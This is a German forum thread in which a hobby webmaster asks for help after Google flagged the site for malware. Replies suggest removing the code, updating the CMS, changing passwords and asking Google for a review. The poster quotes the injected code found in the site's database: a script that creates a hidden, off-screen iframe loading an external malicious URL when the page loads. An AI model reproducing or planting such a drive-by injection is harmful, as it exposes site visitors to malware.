Meine Webseite wurde von Google gesperrt (Maleware durch Dritte)

[Iron.bo]

Hallo Leute, die überschrift trifft mein Problem gleich auf den Punkt..... Meine Homepage wurde als gefährlich von google eingestuft und somit wird diese blockiert. Ich weiß
aber ehrlich gesagt nicht was ich machen soll damit ich die Maleware wieder weg bekomm.

Vllt kann mir hier jemand helfen. Kenn mich damit zuwenig aus.... ich hab meine Homepage schon für das webmaster tool von google angemeldet.... aber keinen Plan sry Leute...

Wär supa nett wenn mir da wer helfen kann. Vllt hatte des Problem ja schonmal wer von euch

 

[Lawnmower]

- Domain?
- Wird ein CMS eingesetzt und wenn ja welches (Name + Version)?
- FTP Passwort zu unsicher?

 

[Iron.bo]

www.freiwild-united.de
FTP Passwort dürfte sicher sein...
CMS ja aber welche version weiß ich ned
Hab hald des Ilch Webpage Programm

 

[Dexter4637]

Irgendwelche verlinkungen die auf "www.freiwild-united.de enthält Inhalte von ironbo.wmw.cc, einer Website, die bekanntermaßen Malware enthält." führt?

 

[Lawnmower]

müsstest schon wissen welche Version. Wenn veraltet solltest unbedingt aktualisieren. Möglicherweise hat sich bereits irgendeine Art Schadcode über eine Sicherheitslücke des CMS eingenistet.
Ausserdem solltest Du alle FTP Passwörter ändern.

 

[Galaxy9000]

Deine Website ist möglicherweise infiziert worden und/oder Links auf Drittanbieter Seiten mit Schadecode/Programme sind vorhanden. Unbedingt vom Netz nehmen und genau analysieren, ggf. den Provider mal fragen, der Deine Website hostet...

 

[Iron.bo]

ironbo.wmw.cc is der webspace name ich bin bei

http://www.webmasterwork.com/

Ergänzung (23. September 2012)

@ Lawnmower wo kann ich die CMS Version rausfinden?

Ergänzung (23. September 2012)

aja wenn ich mein webspace über google prüfen lass (webmaster tools) sagt er dass in denen datein was drinnen is:

http://ironbo.wmw.cc/fwunited/index.php?news-261

http://ironbo.wmw.cc/fwunited/index.php?news-288

http://ironbo.wmw.cc/fwunited/index.php?news-p9

http://ironbo.wmw.cc/fwunited/index.php?news-455

http://ironbo.wmw.cc/fwunited/index.php?news-60

http://ironbo.wmw.cc/fwunited/index.php?news-194

http://ironbo.wmw.cc/fwunited/index.php?news-print-442

http://ironbo.wmw.cc/fwunited/

http://ironbo.wmw.cc/fwunited/index.php?news-p8

http://ironbo.wmw.cc/fwunited/index.php?news-p54

http://ironbo.wmw.cc/fwunited/index.php?news-p48

http://ironbo.wmw.cc/fwunited/index.php?printsite-285

http://ironbo.wmw.cc/fwunited/index.php?news-88

http://ironbo.wmw.cc/fwunited/index.php?printsite-128

http://ironbo.wmw.cc/fwunited/index.php?printsite-59

http://ironbo.wmw.cc/fwunited/index.php?news-116

http://ironbo.wmw.cc/fwunited/index.php?news-186

http://ironbo.wmw.cc/fwunited/index.php?news-285

http://ironbo.wmw.cc/fwunited/index.php?downloads-2

http://ironbo.wmw.cc/fwunited/index.php?news-324

http://ironbo.wmw.cc/fwunited/index.php?news-394

http://ironbo.wmw.cc/fwunited/index.php?gallery-4

http://ironbo.wmw.cc/fwunited/index.php?news-p5

http://ironbo.wmw.cc/fwunited/index.php?dmensch2010

http://ironbo.wmw.cc/fwunited/index.php?dallein



Und des is der verdächtiger code:

Verdächtiger injizierter Code Typ Instanzen
<script type="text/javascript">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://gavlenytt.com/65745292.html";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>

 

[Lawnmower]

ja da wird dynamisch ein Iframe erstellt ohne Dimension, absolut positioniert, ausserhalb des Anzeigebereichs geschoben und eine URL geladen. Warum löscht Du diesen Code nicht einfach?

Das verwendete CMS scheint ja eher im Bereich "Basteln" zu gehen.
An deiner Stelle würde ich wie folgt vorgehen: Du gehst zu einem der grossen deutschen Hosting Anbieter, kaufst dort für ein paar Euro im Jahr Webspace (und eine Domain), installierst mit ein paar Klicks im Adminbereich ein anständiges CMS (z.B. Wordpress) und baust die Seite neu auf (ein Redesign wäre sowiso nötig).

 

[Iron.bo]

ich würd ja den Code gerne löschen von den betroffenen Seiten .... aber wie kann ich da auf diese Seiten zugreifen... diese sind ja in der Datenbank drinnnen.. wie gesagt so gut kenn ich mich ned aus sry...

 

[Lawnmower]

wie oben schon geschrieben wurde das entweder durch ein zu schwaches Passwort oder über eine Sicherheitslücke im CMS reingepflanzt.

Ich empfehle Dir, wenn Du die Webseite weiterhin betreiben willst, das CMS zu aktualisieren (nicht wissen welche Version ist generell dein Problem, Du bist der Webmaster, Du musst das wissen und Dich um die Aktualität deines System kümmern. Ein CMS ist zwar oft mal gratis aber man muss es wie ein Windows System pflegen und aktualisieren) oder noch besser gemäss #8 zu verfahren.

 

[Daaron]

Warum setzt man überhaupt eine Webseite auf, wenn man von so etwas keinen blassen Dunst hat? Es gibt Firmen, die versuchen damit ihr Geld zu verdienen und bei denen kann man dann auch meckern, wenn etwas nicht geht.

 

[Network-HQ]

Es wird wohl nicht nur eine Seite betroffen sein.

Am besten du lädst alle Dateien vom Webspace herunter und suchst die Dateien nach dem iFrame Code ab. In der Datenbank guckst du auch nochmal nach. Dann updatest du dein CMS und änderst alle Passwörter.

Damit Google dich wieder "entsperrt" musst du nach all dem eine Mail an Google senden.

 

[Iron.bo]

Momentan sagt mir ja des Webmaster Tools aber dass es keine Probleme mehr gibt ich hab schon viel geändert und entfernt ..... man kommt auch auf meine Page: http://ironbo.wmw.cc/fwunited/index.php

nur meine Domain www.freiwild-united.de is von Google noch als Gefahr eingestuft und ich weiß ned wie ich des noch weg bekomm. Die Gefahrstellen hab ich jetzt entfernt